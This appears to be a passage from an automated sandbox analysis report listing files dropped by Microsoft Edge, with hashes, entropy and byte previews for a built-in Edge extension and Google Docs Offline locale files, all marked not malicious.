C:\Users\user\AppData\Local\Temp\d13cacc1-76e9-4061-9947-070987742f36.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Local\Temp\scoped_dir8156_113412551\4339b3b8-d721-4e37-972f-33aa0b6dc324.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\scoped_dir8156_113412551\CRX_INSTALL\_metadata\verified_contents.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1753
Entropy (8bit):	5.8889033066924155
Encrypted:	false
SSDEEP:	48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
MD5:	738E757B92939B24CDBBD0EFC2601315
SHA1:	77058CBAFA625AAFBEA867052136C11AD3332143
SHA-256:	D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
SHA-512:	DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
Malicious:	false
Preview:	[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

C:\Users\user\AppData\Local\Temp\scoped_dir8156_113412551\CRX_INSTALL\content.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
Category:	dropped
Size (bytes):	9815
Entropy (8bit):	6.1716321262973315
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
MD5:	3D20584F7F6C8EAC79E17CCA4207FB79
SHA1:	3C16DCC27AE52431C8CDD92FBAAB0341524D3092
SHA-256:	0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
SHA-512:	315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir8156_113412551\CRX_INSTALL\content_new.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
Category:	dropped
Size (bytes):	10388
Entropy (8bit):	6.174387413738973
Encrypted:	false
SSDEEP:	192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
MD5:	3DE1E7D989C232FC1B58F4E32DE15D64
SHA1:	42B152EA7E7F31A964914F344543B8BF14B5F558
SHA-256:	D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
SHA-512:	177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
Malicious:	false
Preview:	(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

C:\Users\user\AppData\Local\Temp\scoped_dir8156_113412551\CRX_INSTALL\manifest.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.698567446030411
Encrypted:	false
SSDEEP:	24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
MD5:	E805E9E69FD6ECDCA65136957B1FB3BE
SHA1:	2356F60884130C86A45D4B232A26062C7830E622
SHA-256:	5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
SHA-512:	049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
Malicious:	false
Preview:	{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir8156_1747464646\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
